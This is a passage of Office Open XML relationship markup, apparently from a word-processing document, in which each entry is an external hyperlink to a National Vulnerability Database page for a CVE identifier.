Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82759" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50606" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50608" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55061" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3030" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-55787" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62167" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10594" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11314" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11432" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11874" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49137" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49292" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52483" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53679" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53681" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57846" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57847" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65323" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73245" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73638" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73639" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78668" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90050" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90051" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90052" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90053" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90054" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90055" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90056" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90057" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90058" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90059" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90060" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90061" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90062" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90063" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90064" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90065" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90066" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90067" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90068" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90069" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90070" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90071" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90072" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90073" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90074" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90075" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90076" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90077" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90078" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90079" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90080" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90081" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90082" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90083" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90084" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90085" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90086" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90087" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90088" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90089" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90090" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90091" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90092" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90093" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90094" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90095" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90096" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90097" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90098" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90099" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90100" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90101" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90102" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90103" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90104" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90105" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90106" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90107" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90108" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90109" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90110" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90111" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90112" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90113" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90114" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90115" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90116" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90117" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90118" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90119" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90120" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90121" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90122" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90123" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90124" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90125" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90126" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90127" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90128" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90129" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90130" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90131" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90132" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90133" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90134" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90135" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90136" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90137" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90138" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90139" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90140" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90141" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90142" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90143" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90144" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90145" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90146" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90147" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90148" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90149" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90150" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90151" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90152" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90153" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90154" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90155" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90156" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90157" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90158" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90159" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90160" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90161" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90162" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90163" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90164" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90165" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90166" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90167" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90168" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90169" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90170" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90171" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90172" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90173" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90174" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90175" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90176" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90177" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90178" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90179" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90180" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90181" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90182" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90183" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90184" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90185" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90186" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90187" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90188" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90189" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90190" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90191" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 